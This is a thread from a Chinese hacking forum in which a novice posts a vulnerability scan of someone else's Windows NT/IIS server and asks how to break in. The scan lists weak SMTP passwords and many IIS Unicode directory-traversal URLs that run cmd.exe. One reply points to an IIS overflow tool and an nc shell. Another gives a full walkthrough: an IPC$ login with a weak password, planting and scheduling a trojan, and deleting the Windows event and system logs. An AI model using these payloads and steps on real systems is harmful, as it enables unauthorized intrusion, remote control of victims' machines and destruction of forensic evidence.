|
 | 作者: hdpxbtj [hdpxbtj]
 论坛用户 |
登录 |
| (Windows NT x.x) 开放端口 25 - SMTP, Simple Mail Transfer Protocol 80 - HTTP, World Wide Web 110 - Pop3, Post Office Protocol - Version 3 135 - Location Service 443 - HttpS, Secure HTTP SMTP漏洞 SMTP弱口令 admin/[空口令] admin/root admin/1 admin/123 admin/123456 admin/654321 admin/!@#$% admin/asdf CGI漏洞 /null.ida /null.idq /scripts/samples/search/qfullhit.htw /scripts/samples/search/qsumrhit.htw /_vti_inf.html /abczxv.htw /_vti_bin/_vti_aut/author.dll /_vti_bin/shtml.dll/_vti_rpc /_vti_pvt/doctodep.btr /_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 /_vti_bin/shtml.dll/nosuch.htm /_vti_bin/shtml.dll /_vti_bin/shtml.exe /scripts/root.exe?/c+dir%20c:\ IIS漏洞 /_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir /scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\ /_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir /scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir /scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir /scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir /scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir /scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/..%255c../winnt/system32/cmd.exe?/c+dir /scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ /scripts/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c%20dir%20C:\ /_vti_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir /scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir /scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir /scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) |
| 地主 发表时间: 05/10 16:26 |
 | 回复: shengqishi [shengqishi]  论坛用户 |
登录 |
|
还是把基础学好吧。象这样的主机入侵也没劲。 |
| B1层 发表时间: 05/10 17:13 |
 | 回复: iqst [iqst]  论坛用户 |
登录 |
|
同意 |
| B2层 发表时间: 05/10 17:22 |
| 回复: hdpxbtj [hdpxbtj] 论坛用户 |
登录 |
|
各位大大,能不能给点有建设性的提议啊。 具体的操作,例如哪个端口可利用,哪个漏洞可入侵。。。 我正在学习嘛! |
| B3层 发表时间: 05/10 18:46 |
| 回复: drckness [drckness]  论坛用户 |
登录 |
|
有两种可能: 一:管理员玩你呢 二:是个人用户 入侵很简单,洞太多了。 |
| B4层 发表时间: 05/10 19:04 |
 | 回复: maer [maer] 论坛用户 |
登录 |
|
放一个木马去就可以了 |
| B5层 发表时间: 05/10 20:50 |
 | 回复: laievf [laievf] 论坛用户 |
登录 |
|
日本有许多WebDav漏洞的主机,可以玩玩啊 |
| B6层 发表时间: 05/10 22:12 |
 | 回复: jackcheng [jackcheng] 论坛用户 |
登录 |
|
大家都玩虚的啊,象我这样的菜鸟也想知道怎么利用这些扫描结果,楼上的具体分析一下啊! |
| B7层 发表时间: 05/11 00:51 |
| 回复: hdpxbtj [hdpxbtj] 论坛用户 |
登录 |
|
就是啊,难道就没有一个热心的高手啊! |
| B8层 发表时间: 05/11 12:06 |
 | 回复: qq [zpisgod] 论坛用户 |
登录 |
|
iis漏洞
http://www.cheater.com.cn/study/Uicode.htm自己去看吧, cgi,简单说一下ida/idq漏洞,使用snake的iis溢出工具,然后用nc监听 如果成功的话,你就会获得一个shell………… 其实现在大都打了sp3。这些iis漏洞的利用率不是很高 |
| B9层 发表时间: 05/11 22:45 |
| 回复: binzaiwan [binzaiwan] 论坛用户 |
登录 |
|
兄弟,你用什么扫描工具,给我一个。 |
| B10层 发表时间: 05/12 00:23 |
| 回复: hdpxbtj [hdpxbtj] 论坛用户 |
登录 |
|
我说QQ,你给的地址打不开哦,还有吗? 给出的端口呢,有哪个可以利用? |
| B11层 发表时间: 05/13 17:25 |
| 回复: bear2000 [bear2000] 论坛用户 |
登录 |
|
我虽然很菜,但我觉得雨花不是一个合格的菜鸟,首先,你可以去百度把扫出的漏洞查一下;然后,你最好在扫描器的说明好好看一下,论坛是好地方,大家最好都能有自己的看法,这样才不辜负Netdemo大哥的一番心意 |
| B12层 发表时间: 05/13 19:41 |
 | 回复: youyou [youyou] 论坛用户 |
登录 |
|
啊这么多漏洞还利用一个了 |
| B13层 发表时间: 05/13 21:45 |
 | 回复: tiancefu [tiancefu] 论坛用户 |
登录 |
|
具体步骤入下(只是利用NT弱口令admin/123)] 1,前提你必须用windows2000/window XP(不要用win98/win me)操作系统. 2,建立IPC$空连接。 在DOS命令下输入net use \\对方IP\ipc$ “123” /user”admin”)(回车)成功会提示命令完成 3 种入木马,copy 木马文件 \\ip\admin$回车,成功会提示命令完成 4 远程运行,net time \\对方IP(回车)获取对方系统时间,at 上面的时间过一会 \\ip 上传的木马文件名(回车) 5 等待 6 启动木马控制端,想干什么干什么 7 退出前清除日志 8 copy con c:\del.bat回车 9 del c:\winnt\system32\logfiles\*.*回车 10 del c:\winnt\system32\config\*.evt回车 11 del c:\winnt\system32\dtclog\*.*回车 12 del c:\winnt\system32\*.log回车 13 del c:\winnt\system32\*.txt回车 14 del c:\winnt\*.txt回车 15 del c:\winnt\*.log回车 16 del c:\del.bat回车 17 CTRL+z完成。 18 重复3,4,5(c:\del.bat copy到对方机器)上 19 net use \\对方IP\ipc$ /delete回车, 20 完成。 |
| B14层 发表时间: 05/14 06:10 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 我扫到某机有以下漏洞,请问如何入侵!